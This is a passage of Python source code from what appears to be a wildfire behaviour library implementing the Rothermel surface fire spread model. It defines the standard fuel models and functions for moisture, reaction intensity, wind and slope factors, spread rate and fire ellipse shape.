0.134, 0.019, 0.007, 0, 0,
2500, 1500, 1500,
False, True)
fuelModels["FM10"] = FuelModel(
10, "FM10", "Timber litter & understory [10]",
1.0, 0.25, 8000, 8000,
0.138, 0.092, 0.230, 0, 0.092,
2000, 1500, 1500,
False, True)
fuelModels["FM11"] = FuelModel(
11, "FM11", "Light logging slash [11]",
1.0, 0.15, 8000, 8000,
0.069, 0.207, 0.253, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["FM12"] = FuelModel(
12, "FM12", "Medium logging slash [12]",
2.3, 0.20, 8000, 8000,
0.184, 0.644, 0.759, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["FM13"] = FuelModel(
13, "FM13", "Heavy logging slash [13]",
3.0, 0.25, 8000, 8000,
0.322, 1.058, 1.288, 0, 0,
1500, 1500, 1500,
False, True)
if not allowDynamicModels:
return fuelModels
else:
pass
# 14-89 Available for custom models
if allowNonBurningModels:
# Code NBx: Non-burnable
# 90 Available for custom NB model
fuelModels["NB1"] = FuelModel(
91, "NB1", "Urban, developed [91]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB2"] = FuelModel(
92, "NB2", "Snow, ice [92]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB3"] = FuelModel(
93, "NB3", "Agricultural [93]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
# Indices 94-95 Reserved for future standard non-burnable models
fuelModels["NB4"] = FuelModel(
94, "NB4", "Future standard non-burnable [94]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB5"] = FuelModel(
95, "NB5", "Future standard non-burnable [95]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
# Indices 96-97 Available for custom NB model
fuelModels["NB8"] = FuelModel(
98, "NB8", "Open water [98]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB9"] = FuelModel(
99, "NB9", "Bare ground [99]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
# Code GRx: Grass
# Index 100 Available for custom GR model
f = 2000.0 / 43560.0
fuelModels["GR1"] = FuelModel(
101, "GR1", "Short, sparse, dry climate grass (D)",
0.4, 0.15, 8000, 8000,
0.10*f, 0, 0, 0.30*f, 0,
2200, 2000, 1500,
True, True)
fuelModels["GR2"] = FuelModel(
102, "GR2", "Low load, dry climate grass (D)",
1.0, 0.15, 8000, 8000,
0.10*f, 0, 0, 1.0*f, 0,
2000, 1800, 1500,
True, True)
fuelModels["GR3"] = FuelModel(
103, "GR3", "Low load, very coarse, humid climate grass (D)",
2.0, 0.30, 8000, 8000,
0.10*f, 0.40*f, 0, 1.50*f, 0,
1500, 1300, 1500,
True, True)
fuelModels["GR4"] = FuelModel(
104, "GR4", "Moderate load, dry climate grass (D)",
2.0, 0.15, 8000, 8000,
0.25*f, 0, 0, 1.9*f, 0,
2000, 1800, 1500,
True, True)
fuelModels["GR5"] = FuelModel(
105, "GR5", "Low load, humid climate grass (D)",
1.5, 0.40, 8000, 8000,
0.40*f, 0.0, 0.0, 2.50*f, 0.0,
1800, 1600, 1500,
True, True)
fuelModels["GR6"] = FuelModel(
106, "GR6", "Moderate load, humid climate grass (D)",
1.5, 0.40, 9000, 9000,
0.10*f, 0, 0, 3.4*f, 0,
2200, 2000, 1500,
True, True)
fuelModels["GR7"] = FuelModel(
107, "GR7", "High load, dry climate grass (D)",
3.0, 0.15, 8000, 8000,
1.0*f, 0, 0, 5.4*f, 0,
2000, 1800, 1500,
True, True)
fuelModels["GR8"] = FuelModel(
108, "GR8", "High load, very coarse, humid climate grass (D)",
4.0, 0.30, 8000, 8000,
0.5*f, 1.0*f, 0, 7.3*f, 0,
1500, 1300, 1500,
True, True)
fuelModels["GR9"] = FuelModel(
109, "GR9", "Very high load, humid climate grass (D)",
5.0, 0.40, 8000, 8000,
1.0*f, 1.0*f, 0, 9.0*f, 0,
1800, 1600, 1500,
True, True)
# 110-112 are reserved for future standard grass models
# 113-119 are available for custom grass models
# Code GSx: Grass and shrub
# 120 available for custom grass and shrub model
fuelModels["GS1"] = FuelModel(
121, "GS1", "Low load, dry climate grass-shrub (D)",
0.9, 0.15, 8000, 8000,
0.2*f, 0, 0, 0.5*f, 0.65*f,
2000, 1800, 1800,
True, True)
fuelModels["GS2"] = FuelModel(
122, "GS2", "Moderate load, dry climate grass-shrub (D)",
1.5, 0.15, 8000, 8000,
0.5*f, 0.5*f, 0, 0.6*f, 1.0*f,
2000, 1800, 1800,
True, True)
fuelModels["GS3"] = FuelModel(
123, "GS3", "Moderate load, humid climate grass-shrub (D)",
1.8, 0.40, 8000, 8000,
0.3*f, 0.25*f, 0, 1.45*f, 1.25*f,
1800, 1600, 1600,
True, True)
fuelModels["GS4"] = FuelModel(
124, "GS4", "High load, humid climate grass-shrub (D)",
2.1, 0.40, 8000, 8000,
1.9*f, 0.3*f, 0.1*f, 3.4*f, 7.1*f,
1800, 1600, 1600,
True, True)
# 125-130 reserved for future standard grass and shrub models
# 131-139 available for custom grass and shrub models
# Shrub
# 140 available for custom shrub model
fuelModels["SH1"] = FuelModel(
141, "SH1", "Low load, dry climate shrub (D)",
1.0, 0.15, 8000, 8000,
0.25*f, 0.25*f, 0, 0.15*f, 1.3*f,
2000, 1800, 1600,
True, True)
fuelModels["SH2"] = FuelModel(
142, "SH2", "Moderate load, dry climate shrub (S)",
1.0, 0.15, 8000, 8000,
1.35*f, 2.4*f, 0.75*f, 0, 3.85*f,
2000, 1800, 1600,
True, True)
fuelModels["SH3"] = FuelModel(
143, "SH3", "Moderate load, humid climate shrub (S)",
2.4, 0.40, 8000., 8000.,
0.45*f, 3.0*f, 0, 0, 6.2*f,
1600, 1800, 1400,
True, True)
fuelModels["SH4"] = FuelModel(
144, "SH4", "Low load, humid climate timber-shrub (S)",
3.0, 0.30, 8000, 8000,
0.85*f, 1.15*f, 0.2*f, 0, 2.55*f,
2000, 1800, 1600,
True, True)
fuelModels["SH5"] = FuelModel(
145, "SH5", "High load, dry climate shrub (S)",
6.0, 0.15, 8000, 8000,
3.6*f, 2.1*f, 0, 0, 2.9*f,
750, 1800, 1600,
True, True)
fuelModels["SH6"] = FuelModel(
146, "SH6", "Low load, humid climate shrub (S)",
2.0, 0.30, 8000, 8000,
2.9*f, 1.45*f, 0, 0, 1.4*f,
750, 1800, 1600,
True, True)
fuelModels["SH7"] = FuelModel(
147, "SH7", "Very high load, dry climate shrub (S)",
6.0, 0.15, 8000, 8000,
3.5*f, 5.3*f, 2.2*f, 0, 3.4*f,
750, 1800, 1600,
True, True)
fuelModels["SH8"] = FuelModel(
148, "SH8", "High load, humid climate shrub (S)",
3.0, 0.40, 8000, 8000,
2.05*f, 3.4*f, 0.85*f, 0, 4.35*f,
750, 1800, 1600,
True, True)
fuelModels["SH9"] = FuelModel(
149, "SH9", "Very high load, humid climate shrub (D)",
4.4, 0.40, 8000, 8000,
4.5*f, 2.45*f, 0, 1.55*f, 7.0*f,
750, 1800, 1500,
True, True)
# 150-152 reserved for future standard shrub models
# 153-159 available for custom shrub models
# Timber and understory
# 160 available for custom timber and understory model
fuelModels["TU1"] = FuelModel(
161, "TU1", "Light load, dry climate timber-grass-shrub (D)",
0.6, 0.20, 8000, 8000,
0.2*f, 0.9*f, 1.5*f, 0.2*f, 0.9*f,
2000, 1800, 1600,
True, True)
fuelModels["TU2"] = FuelModel(
162, "TU2", "Moderate load, humid climate timber-shrub (S)",
1.0, 0.30, 8000, 8000,
0.95*f, 1.8*f, 1.25*f, 0, 0.2*f,
2000, 1800, 1600,
True, True)
fuelModels["TU3"] = FuelModel(
163, "TU3", "Moderate load, humid climate timber-grass-shrub (D)",
1.3, 0.30, 8000, 8000,
1.1*f, 0.15*f, 0.25*f, 0.65*f, 1.1*f,
1800, 1600, 1400,
True, True)
fuelModels["TU4"] = FuelModel(
164, "TU4", "Dwarf conifer understory (S)",
0.5, 0.12, 8000, 8000,
4.5*f, 0, 0, 0, 2.0*f,
2300, 1800, 2000,
True, True)
fuelModels["TU5"] = FuelModel(
165, "TU5", "Very high load, dry climate timber-shrub (S)",
1.0, 0.25, 8000, 8000,
4.0*f, 4.0*f, 3.0*f, 0, 3.0*f,
1500, 1800, 750,
True, True)
# 166-170 reserved for future standard timber and understory models
# 171-179 available for custom timber and understory models
# Timber and litter
# 180 available for custom timber and litter models
fuelModels["TL1"] = FuelModel(
181, "TL1", "Low load, compact conifer litter (S)",
0.2, 0.30, 8000, 8000,
1.0*f, 2.2*f, 3.6*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL2"] = FuelModel(
182, "TL2", "Low load broadleaf litter (S)",
0.2, 0.25, 8000, 8000,
1.4*f, 2.3*f, 2.2*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL3"] = FuelModel(
183, "TL3", "Moderate load conifer litter (S)",
0.3, 0.20, 8000, 8000,
0.5*f, 2.2*f, 2.8*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL4"] = FuelModel(
184, "TL4", "Small downed logs (S)",
0.4, 0.25, 8000, 8000,
0.5*f, 1.5*f, 4.2*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL5"] = FuelModel(
185, "TL5", "High load conifer litter (S)",
0.6, 0.25, 8000, 8000,
1.15*f, 2.5*f, 4.4*f, 0, 0,
2000, 1800, 160, # live woody SAVR differs from the other TL models; harmless here since the live woody load above is zero
True, True)
fuelModels["TL6"] = FuelModel(
186, "TL6", "High load broadleaf litter (S)",
0.3, 0.25, 8000, 8000,
2.4*f, 1.2*f, 1.2*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL7"] = FuelModel(
187, "TL7", "Large downed logs (S)",
0.4, 0.25, 8000, 8000,
0.3*f, 1.4*f, 8.1*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL8"] = FuelModel(
188, "TL8", "Long-needle litter (S)",
0.3, 0.35, 8000, 8000,
5.8*f, 1.4*f, 1.1*f, 0, 0,
1800, 1800, 1600,
True, True)
fuelModels["TL9"] = FuelModel(
189, "TL9", "Very high load broadleaf litter (S)",
0.6, 0.35, 8000, 8000,
6.65*f, 3.30*f, 4.15*f, 0, 0,
1800, 1800, 1600,
True, True)
# 190-192 reserved for future standard timber and litter models
# 193-199 available for custom timber and litter models
# Slash and blowdown
# 200 available for custom slash and blowdown model
fuelModels["SB1"] = FuelModel(
201, "SB1", "Low load activity fuel (S)",
1.0, 0.25, 8000, 8000,
1.5*f, 3.0*f, 11.0*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["SB2"] = FuelModel(
202, "SB2", "Moderate load activity or low load blowdown (S)",
1.0, 0.25, 8000, 8000,
4.5*f, 4.25*f, 4.0*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["SB3"] = FuelModel(
203, "SB3", "High load activity fuel or moderate load blowdown (S)",
1.2, 0.25, 8000, 8000,
5.5*f, 2.75*f, 3.0*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["SB4"] = FuelModel(
204, "SB4", "High load blowdown (S)",
2.7, 0.25, 8000, 8000,
5.25*f, 3.5*f, 5.25*f, 0, 0,
2000, 1800, 1600,
True, True)
return fuelModels
def buildFuelModelsIdx():
fuelModels = np.empty((256,),dtype=object)
fuelModels[1] = 'FM1'
fuelModels[2] = 'FM2'
fuelModels[3] = 'FM3'
fuelModels[4] = 'FM4'
fuelModels[5] = 'FM5'
fuelModels[6] = 'FM6'
fuelModels[7] = 'FM7'
fuelModels[8] = 'FM8'
fuelModels[9] = 'FM9'
fuelModels[10] = 'FM10'
fuelModels[11] = 'FM11'
fuelModels[12] = 'FM12'
fuelModels[13] = 'FM13'
# 14-89 Available for custom models
fuelModels[91] = 'NB1'
fuelModels[92] = 'NB2'
fuelModels[93] = 'NB3'
# Indices 94-95 Reserved for future standard non-burnable models
# Indices 96-97 Available for custom NB model
fuelModels[98] = 'NB8'
fuelModels[99] = 'NB9'
# Index 100 Available for custom GR model
fuelModels[101] = 'GR1'
fuelModels[102] = 'GR2'
fuelModels[103] = 'GR3'
fuelModels[104] = 'GR4'
fuelModels[105] = 'GR5'
fuelModels[106] = 'GR6'
fuelModels[107] = 'GR7'
fuelModels[108] = 'GR8'
fuelModels[109] = 'GR9'
# 110-112 are reserved for future standard grass models
# 113-119 are available for custom grass models
# 120 available for custom grass and shrub model
fuelModels[121] = 'GS1'
fuelModels[122] = 'GS2'
fuelModels[123] = 'GS3'
fuelModels[124] = 'GS4'
# 125-130 reserved for future standard grass and shrub models
# 131-139 available for custom grass and shrub models
# 140 available for custom shrub model
fuelModels[141] = 'SH1'
fuelModels[142] = 'SH2'
fuelModels[143] = 'SH3'
fuelModels[144] = 'SH4'
fuelModels[145] = 'SH5'
fuelModels[146] = 'SH6'
fuelModels[147] = 'SH7'
fuelModels[148] = 'SH8'
fuelModels[149] = 'SH9'
# 150-152 reserved for future standard shrub models
# 153-159 available for custom shrub models
# 160 available for custom timber and understory model
fuelModels[161] = 'TU1'
fuelModels[162] = 'TU2'
fuelModels[163] = 'TU3'
fuelModels[164] = 'TU4'
fuelModels[165] = 'TU5'
# 166-170 reserved for future standard timber and understory models
# 171-179 available for custom timber and understory models
# 180 available for custom timber and litter models
fuelModels[181] = 'TL1'
fuelModels[182] = 'TL2'
fuelModels[183] = 'TL3'
fuelModels[184] = 'TL4'
fuelModels[185] = 'TL5'
fuelModels[186] = 'TL6'
fuelModels[187] = 'TL7'
fuelModels[188] = 'TL8'
fuelModels[189] = 'TL9'
# 190-192 reserved for future standard timber and litter models
# 193-199 available for custom timber and litter models
# 200 available for custom slash and blowdown model
fuelModels[201] = 'SB1'
fuelModels[202] = 'SB2'
fuelModels[203] = 'SB3'
fuelModels[204] = 'SB4'
return fuelModels
def getFuelModel(fuelModel):
fuelModels = buildFuelModels(allowDynamicModels=True,allowNonBurningModels=True)
return fuelModels[fuelModel]
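# Usage sketch (illustrative, not part of the validation cases below): look up
# one of the reserved fuel models defined above and inspect a couple of its
# loading parameters. Any key returned by buildFuelModels() works the same way.
def exampleFuelModelLookup(key='GR1'):
    fuelModel = getFuelModel(key)
    print(fuelModel) # FuelModel.__str__ shows the id, code, and name
    return fuelModel.fuelBedDepth, fuelModel.fuelLoad1Hour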
def getMoistureContent(m1h,m10h,m100h,lhm,lwm):
moistureDead = [m1h,m10h,m100h,m1h] # the fourth dead class (cured herbaceous) reuses the 1-h moisture
moistureLive = [lhm,lwm]
moistureDead = [x/100 for x in moistureDead]
moistureLive = [x/100 for x in moistureLive]
return moistureDead, moistureLive
def getSAV(fuelModel):
# In behavePlus, there is a conversion to surfaceAreaToVolumeUnits
# 109 and 30 ft2/ft3 are the fixed SAV ratios for the 10-h and 100-h dead
# classes; the fourth dead class (cured herbaceous) uses the live herb SAV.
savrDead = [fuelModel.savr1HourFuel, 109.0, 30.0, fuelModel.savrLiveHerb]
savrLive = [fuelModel.savrLiveHerb, fuelModel.savrLiveWood, 0.0, 0.0]
return savrDead, savrLive
def getFuelLoad(fuelModel,moistureLive):
loadDead = [fuelModel.fuelLoad1Hour,
fuelModel.fuelLoad10Hour,
fuelModel.fuelLoad100Hour,
0.0]
loadLive = [fuelModel.fuelLoadLiveHerb,
fuelModel.fuelLoadLiveWood,
0.0,
0.0]
#print(loadDead)
#print(loadLive)
if fuelModel.isDynamic:
if moistureLive[0] < 0.30:
loadDead[3] = loadLive[0]
loadLive[0] = 0.0
elif moistureLive[0] <= 1.20:
#print(loadLive[0] * (1.333 - 1.11 * moistureLive[0]))
loadDead[3] = loadLive[0] * (1.333 - 1.11 * moistureLive[0])
#loadDead[3] = loadLive[0] * (1.20 - moistureLive[0])/0.9
loadLive[0] = loadLive[0] - loadDead[3]
#print(loadLive)
#print(loadDead)
#print(loadDead)
#print(loadLive)
return loadDead, loadLive
def getHeatOfCombustion(fuelModel):
heatOfCombustionDead = fuelModel.heatOfCombustionDeadFuel
heatOfCombustionLive = fuelModel.heatOfCombustionLiveFuel
return heatOfCombustionDead, heatOfCombustionLive
def getDLFraction(fuelModel,moistureLive):
fuelDensity = 32.0 # Rothermel 1972
savrDead, savrLive = getSAV(fuelModel)
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
#print(loadDead)
#print(savrDead)
surfaceAreaDead = [x*y/fuelDensity for x,y in zip(loadDead,savrDead)]
surfaceAreaLive = [x*y/fuelDensity for x,y in zip(loadLive,savrLive)]
#print(surfaceAreaDead)
totalSurfaceAreaDead = np.sum(surfaceAreaDead)
totalSurfaceAreaLive = np.sum(surfaceAreaLive)
fractionOfTotalSurfaceAreaDead = totalSurfaceAreaDead/(totalSurfaceAreaDead+totalSurfaceAreaLive)
fractionOfTotalSurfaceAreaLive = 1.0 - fractionOfTotalSurfaceAreaDead
if totalSurfaceAreaDead > 1.0e-7:
deadFraction = [x/totalSurfaceAreaDead for x in surfaceAreaDead]
else:
deadFraction= [0 for x in surfaceAreaDead]
if totalSurfaceAreaLive > 1.0e-7:
liveFraction = [x/totalSurfaceAreaLive for x in surfaceAreaLive]
else:
liveFraction= [0 for x in surfaceAreaLive]
return deadFraction, liveFraction, fractionOfTotalSurfaceAreaDead, fractionOfTotalSurfaceAreaLive
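# Sketch of the surface-area weighting above (illustrative values): FM1 carries
# only 1-hour dead fuel, so all dead surface area falls in the first size class,
# giving deadFraction = [1, 0, 0, 0] and a dead life-state fraction of 1.0.
def exampleDeadLiveFractions():
    fm = getFuelModel('FM1')
    moistureDead, moistureLive = getMoistureContent(8, 6, 4, 60, 60)
    return getDLFraction(fm, moistureLive)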
def getMoistOfExt(fuelModel,moistureDead,moistureLive):
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
savrDead, savrLive = getSAV(fuelModel)
moistOfExtDead = fuelModel.moistureOfExtinctionDeadFuel
fineDead = 0.0
fineLive = 0.0
fineFuelsWeightingFactor = 0.0
weightedMoistureFineDead = 0.0
fineDeadMoisture = 0.0
fineDeadOverFineLive = 0.0
for i in range(0,len(loadDead)):
if savrDead[i] > 1.0e-7:
fineFuelsWeightingFactor = loadDead[i] * np.exp(-138.0/savrDead[i])
fineDead = fineDead + fineFuelsWeightingFactor
weightedMoistureFineDead = weightedMoistureFineDead + fineFuelsWeightingFactor * moistureDead[i]
if fineDead > 1.0e-7:
fineDeadMoisture = weightedMoistureFineDead / fineDead
for i in range(0,len(loadLive)):
if savrLive[i] > 1.0e-7:
fineLive = fineLive + loadLive[i]*np.exp(-500.0/savrLive[i])
if fineLive > 1.0e-7:
fineDeadOverFineLive = fineDead / fineLive
moistOfExtLive = (2.9 * fineDeadOverFineLive * (1.0 - (fineDeadMoisture) / moistOfExtDead)) - 0.226
#print("MoEL:",moistOfExtLive)
if moistOfExtLive < moistOfExtDead:
moistOfExtLive = moistOfExtDead
return moistOfExtDead, moistOfExtLive
def getCharacteristicSAVR(fuelModel,intermediates,moistureLive):
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
weightedSavrLive = intermediates.live[3]
weightedSavrDead = intermediates.dead[3]
sigma = deadFractionTotal * weightedSavrDead + liveFractionTotal * weightedSavrLive
return sigma
def getPackingRatios(fuelModel,intermediates,moistureLive):
fuelDensity = 32.0 # Rothermel 1972
sigma = getCharacteristicSAVR(fuelModel,intermediates,moistureLive)
totalLoadForLifeStateLive = intermediates.live[4]
totalLoadForLifeStateDead = intermediates.dead[4]
totalLoad = totalLoadForLifeStateLive + totalLoadForLifeStateDead
depth = fuelModel.fuelBedDepth
bulkDensity = totalLoad / depth
packingRatio = totalLoad / (depth * fuelDensity)
sigma = round(sigma,0)
optimumPackingRatio = 3.348 / (sigma**0.8189)
#packingRatio = round(packingRatio,4)
relativePackingRatio = packingRatio / optimumPackingRatio
return packingRatio, relativePackingRatio, bulkDensity
def getWeightedFuelLoads(fuelModel,intermediates):
weightedFuelLoadDead = intermediates.dead[5]
weightedFuelLoadLive = intermediates.live[5]
return weightedFuelLoadDead, weightedFuelLoadLive
def getWeightedHeats(fuelModel,intermediates):
weightedHeatDead = intermediates.dead[0]
weightedHeatLive = intermediates.live[0]
return weightedHeatDead, weightedHeatLive
def getWeightedSilicas(fuelModel,intermediates):
weightedSilicaDead = intermediates.dead[1]
weightedSilicaLive = intermediates.live[1]
return weightedSilicaDead, weightedSilicaLive
def getHeatSink(fuelModel,moistureDead,moistureLive,bulkDensity):
savrDead, savrLive = getSAV(fuelModel)
qigDead = np.zeros((len(savrDead),))
qigLive = np.zeros((len(savrLive),))
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
heatSink = 0
for i in range(0,len(savrDead)):
if savrDead[i] > 1.0e-7:
qigDead[i] = 250 + 1116.0 * (moistureDead[i])
heatSink = heatSink + deadFractionTotal*deadFraction[i]*qigDead[i]*np.exp(-138.0/savrDead[i])
if savrLive[i] > 1.0e-7:
qigLive[i] = 250 + 1116.0 * (moistureLive[i])
heatSink = heatSink + liveFractionTotal*liveFraction[i]*qigLive[i]*np.exp(-138.0/savrLive[i])
heatSink = heatSink * bulkDensity
return heatSink
def getHeatFlux(fuelModel,moistureDead,moistureLive,sigma,packingRatio):
if sigma < 1.0e-7:
heatFlux = 0.0
else:
heatFlux = np.exp((0.792 + 0.681 * sigma**0.5)*(packingRatio + 0.1)) / (192 + 0.2595 * sigma)
return heatFlux
def getWeightedMoistures(fuelModel,intermediates):
weightedMoistureDead = intermediates.dead[2]
weightedMoistureLive = intermediates.live[2]
return weightedMoistureDead, weightedMoistureLive
def getEtaM(fuelModel,intermediates,MoED,MoEL):
weightedMoistureDead, weightedMoistureLive = getWeightedMoistures(fuelModel,intermediates)
def calculateEtaM(weightedMoisture,MoE):
relativeMoisture = 0.0
if MoE > 0.0:
relativeMoisture = weightedMoisture / MoE
if weightedMoisture > MoE or relativeMoisture > 1.0:
etaM = 0
else:
etaM = 1.0 - (2.59 * relativeMoisture) + (5.11 * (relativeMoisture**2))-(3.52*(relativeMoisture**3))
return etaM
etaMDead = calculateEtaM(weightedMoistureDead,MoED)
etaMLive = calculateEtaM(weightedMoistureLive,MoEL)
return etaMDead, etaMLive
def getEtaS(fuelModel,intermediates):
weightedSilicaDead, weightedSilicaLive = getWeightedSilicas(fuelModel,intermediates)
def calculateEtaS(weightedSilica):
etaSDen = weightedSilica ** 0.19
if etaSDen < 1e-6:
etaS = 0.0
else:
etaS = 0.174 / etaSDen
return min([etaS,1.0])
etaSDead = calculateEtaS(weightedSilicaDead)
etaSLive = calculateEtaS(weightedSilicaLive)
return etaSDead, etaSLive
def getSurfaceFireReactionIntensity(fuelModel,sigma,relativePackingRatio,MoED,MoEL,intermediates):
aa = 133.0 / (sigma ** 0.7913) # Albini 1976
gammaMax = (sigma ** 1.5) / (495.0+(0.0594*(sigma**1.5)))
gamma = gammaMax * (relativePackingRatio**aa) * np.exp(aa * (1.0-relativePackingRatio))
weightedFuelLoadDead, weightedFuelLoadLive = getWeightedFuelLoads(fuelModel,intermediates)
weightedHeatDead, weightedHeatLive = getWeightedHeats(fuelModel,intermediates)
#MoEL = 1.99
etaMDead, etaMLive = getEtaM(fuelModel,intermediates,MoED,MoEL)
etaSDead, etaSLive = getEtaS(fuelModel,intermediates)
#print("gamma:",gamma)
#print("weightedFuelLoadDead/Live:",weightedFuelLoadDead,weightedFuelLoadLive)
#print("weightedHeatDead/Live:",weightedHeatDead,weightedHeatLive)
#print("etaMDead/Live",etaMDead,etaMLive)
#print("etaSDead/Live",etaSDead,etaSLive)
"""
print("gamma",gamma)
print("weightedFuelLoadDead",weightedFuelLoadDead)
print("weightedHeatDead",weightedHeatDead,weightedHeatLive)
print("etaMDead",etaMDead,etaMLive)
print("etaSDead",etaSDead,etaSLive)
"""
reactionIntensityDead = gamma * weightedFuelLoadDead * weightedHeatDead * etaMDead * etaSDead
reactionIntensityLive = gamma * weightedFuelLoadLive * weightedHeatLive * etaMLive * etaSLive
#reactionIntensityDead = 7505
reactionIntensity = reactionIntensityDead+reactionIntensityLive
#print("Dead Fuel Reaction Intensity: %.0f"%(reactionIntensityDead))
#print("Live Fuel Reaction Intensity: %.0f"%(reactionIntensityLive))
#print("Reaction Intensity: %.0f"%(reactionIntensity))
return reactionIntensity, reactionIntensityDead, reactionIntensityLive
def getNoWindNoSlopeSpreadRate(reactionIntensity,heatFlux,heatSink):
if heatSink < 1.0e-7:
Rstar = 0.0
else:
Rstar = reactionIntensity*heatFlux/heatSink
#print("HeatSource:",reactionIntensity*heatFlux)
#print("NoWindNoSlopeSpredRate:",Rstar)
return Rstar
def convertFtMinToChHr(R):
R = R/1.100
return R
def calculateMidflameWindSpeed(fuelModel,windSpeed,canopyCover,canopyHeight,crownRatio,
windHeightInputMode='TwentyFoot'):
if windHeightInputMode == 'TenMeter':
windSpeed = windSpeed/ 1.15
depth = fuelModel.fuelBedDepth
canopyCrownFraction = crownRatio * canopyCover / 3.0
if canopyCover < 1.0e-7 or canopyCrownFraction < 0.05 or canopyHeight < 6.0:
sheltered = False
else:
sheltered = True
if sheltered:
waf = 0.555 / (((canopyCrownFraction * canopyHeight)**0.5)*np.log((20.0+0.36*canopyHeight) / (0.13 * canopyHeight)))
elif depth > 1.0e-7:
waf = 1.83 / np.log((20.0+0.36 * depth) / (0.13 * depth))
else:
waf = 1.0
midflameWindSpeed = waf * windSpeed
return midflameWindSpeed, waf
def calculateWindFactor(sigma,relativePackingRatio,mfWindSpeed):
windC, windB, windE = getWindIntermediates(sigma)
mfWindSpeed = mfWindSpeed*88 # Convert mph to ft/min
if mfWindSpeed < 1.0e-7:
phiW = 0.0
else:
phiW = (mfWindSpeed**windB) * windC * (relativePackingRatio**(-windE))
return phiW
def getWindIntermediates(sigma):
windC = 7.47 * np.exp(-0.133 * (sigma**0.55))
windB = 0.02526 * (sigma ** 0.54)
windE = 0.715 * np.exp(-0.000359*sigma)
return windC, windB, windE
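# Sketch of the wind factor (illustrative values): for sigma = 1500 ft2/ft3, a
# relative packing ratio of 1.0, and a 5 mi/h midflame wind, phiW reduces to
# windC * (5*88)**windB because the packing-ratio term is 1.
def exampleWindFactor(sigma=1500.0, relativePackingRatio=1.0, mfWindSpeed=5.0):
    return calculateWindFactor(sigma, relativePackingRatio, mfWindSpeed)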
def calculateSlopeFactor(slope,packingRatio,isAngle=False,isDegree=True):
if isAngle:
if isDegree:
slope = slope/180.0*3.1415926535
slopex = np.tan(slope)
else:
slopex = slope
phiS = 5.275 * (packingRatio**(-0.3)) * (slopex**2)
return phiS
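# Sketch of the slope factor (illustrative values): a 30% slope passed as a
# fraction with packing ratio 0.01 gives phiS = 5.275 * 0.01**-0.3 * 0.3**2,
# roughly 1.9.
def exampleSlopeFactor(slope=0.3, packingRatio=0.01):
    return calculateSlopeFactor(slope, packingRatio, isAngle=False)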
def calculateROS(Rstar,phiW,phiS):
R = Rstar * (1+phiW+phiS)
return R
def calculateDirectionOfMaxSpread(windDir,aspect,Rstar,phiS,phiW):
correctedWindDir = windDir-aspect
windDirRadians = correctedWindDir * 3.1415926535 / 180.0
slopeRate = Rstar*phiS
windRate = Rstar*phiW
x = slopeRate + (windRate * np.cos(windDirRadians))
y = windRate * np.sin(windDirRadians)
rateVector = ((x**2)+(y**2))**0.5
forwardSpreadRate = Rstar + rateVector
azimuth = np.arctan2(y,x) * 180.0 / 3.1415926535
if azimuth < -1.0e-20:
azimuth = azimuth + 360
azimuth = azimuth + aspect + 180.0
if azimuth >= 360.0:
azimuth = azimuth - 360.0
return azimuth, forwardSpreadRate
def calculateWindSpeedLimit(reactionIntensity,phiS):
windSpeedLimit = 0.9 * reactionIntensity
# Note: this clamp only affects the local copy of phiS; the caller's slope
# factor is unchanged because phiS is not returned.
if phiS > 0.0:
if phiS > windSpeedLimit:
phiS = windSpeedLimit
return windSpeedLimit
def calculateEffectiveWindSpeed(forwardSpreadRate,Rstar,relativePackingRatio,sigma,windSpeedLimit=9001):
windC, windB, windE = getWindIntermediates(sigma)
phiEffectiveWind = forwardSpreadRate/Rstar - 1.0
effectiveWindSpeed = ((phiEffectiveWind*(relativePackingRatio**windE)) / windC)**(1/windB)
effectiveWindSpeed = effectiveWindSpeed / 88
if effectiveWindSpeed > windSpeedLimit/88:
effectiveWindSpeed = windSpeedLimit/88
return effectiveWindSpeed
def getResidenceTime(sigma):
if sigma < 1.0e-7:
residenceTime = 0.0
else:
residenceTime = 384.0/sigma
return residenceTime
def calculateFireBasicDimensions(effectiveWindSpeed,forwardSpreadRate):
#print("***EFF,",effectiveWindSpeed)#*88/60)
if effectiveWindSpeed > 1.0e-7:
fireLengthToWidthRatio = 1.0 + (0.25 * effectiveWindSpeed)#*88/60)
else:
fireLengthToWidthRatio = 1.0
#print("default fl2wr:",fireLengthToWidthRatio)
#print("default ecc:",(1-(1/fireLengthToWidthRatio)**2)**0.5)
#fireLengthToWidthRatio = 1.174
#fireLengthToWidthRatio = 2.25
#fireLengthToWidthRatio = 1.174 # with effective wind speed 15.7 mi/h
#fireLengthToWidthRatio = 1.161 # with effective wind speed 8.5 mi/h
#fireLengthToWidthRatio = 1.145 # with effective wind speed 5.0 mi/h
x = (fireLengthToWidthRatio**2) - 1.0
if x > 0.0:
eccentricity = (x**0.5) / fireLengthToWidthRatio
#eccentricity = (1-(1/fireLengthToWidthRatio)**2)**0.5
else:
eccentricity = 0.0
#eccentricity = 0.9045
#print("modded fl2wr:",fireLengthToWidthRatio)
